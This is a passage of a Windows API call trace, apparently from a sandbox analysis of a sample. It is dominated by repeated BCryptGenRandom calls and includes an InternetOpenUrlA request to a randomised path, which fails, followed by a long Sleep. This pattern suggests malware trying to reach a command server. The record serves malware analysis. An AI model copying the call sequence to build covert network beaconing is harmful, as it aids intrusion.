pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.022] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.022] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.023] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.023] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.024] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.024] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d5e79, cbBuffer=0x2f, dwFlags=0x2 | out: pbBuffer=0x4d5e79) returned 0x0 [0184.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.025] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.025] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.026] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.026] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.027] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.027] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.028] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.028] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.029] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.030] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.031] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.032] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.032] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.032] GetProcessHeap () returned 0x440000 [0184.032] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472b10 [0184.032] lstrcpyA (in: lpString1=0x472b10, lpString2="\x04" | out: lpString1="\x04") returned="\x04" [0184.032] lstrcatA (in: lpString1="\x04", lpString2="/jiLjvZBadovbw73ro1is/1iIhva7ojdoburmjk/aAdpV6o0Xx39lGmszcoBZfy8jzab4k3hvEI6vs1vxjyi7ozp/eaHfw0jawIqXcKo627W1685owrmuoo9Va6Bpks9ezcLwXb/" | out: lpString1="\x04/jiLjvZBadovbw73ro1is/1iIhva7ojdoburmjk/aAdpV6o0Xx39lGmszcoBZfy8jzab4k3hvEI6vs1vxjyi7ozp/eaHfw0jawIqXcKo627W1685owrmuoo9Va6Bpks9ezcLwXb/") returned="\x04/jiLjvZBadovbw73ro1is/1iIhva7ojdoburmjk/aAdpV6o0Xx39lGmszcoBZfy8jzab4k3hvEI6vs1vxjyi7ozp/eaHfw0jawIqXcKo627W1685owrmuoo9Va6Bpks9ezcLwXb/" [0184.033] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0184.033] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="\x04/jiLjvZBadovbw73ro1is/1iIhva7ojdoburmjk/aAdpV6o0Xx39lGmszcoBZfy8jzab4k3hvEI6vs1vxjyi7ozp/eaHfw0jawIqXcKo627W1685owrmuoo9Va6Bpks9ezcLwXb/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0184.033] GetProcessHeap () returned 0x440000 [0184.033] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472b10 | out: hHeap=0x440000) returned 1 [0184.033] GetProcessHeap () returned 0x440000 [0184.033] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d5e20 | out: hHeap=0x440000) returned 1 [0184.033] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0184.033] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0184.034] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.034] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0184.034] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0184.034] Sleep (dwMilliseconds=0x12194) [0184.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0184.306] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.306] GetProcessHeap () returned 0x440000 [0184.306] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x64) returned 0x3a1b250 [0184.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b251, cbBuffer=0x1b, dwFlags=0x2 | out: pbBuffer=0x3a1b251) returned 0x0 [0184.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.307] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.307] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.308] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0184.308] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.309] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.309] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.310] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.310] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.311] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.311] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0184.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3a1b26c, cbBuffer=0x2d, dwFlags=0x2 | out: pbBuffer=0x3a1b26c) returned 0x0 [0184.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.312] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.312] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.313] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.313] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.314] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.314] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.315] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0184.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0184.316] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0184.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 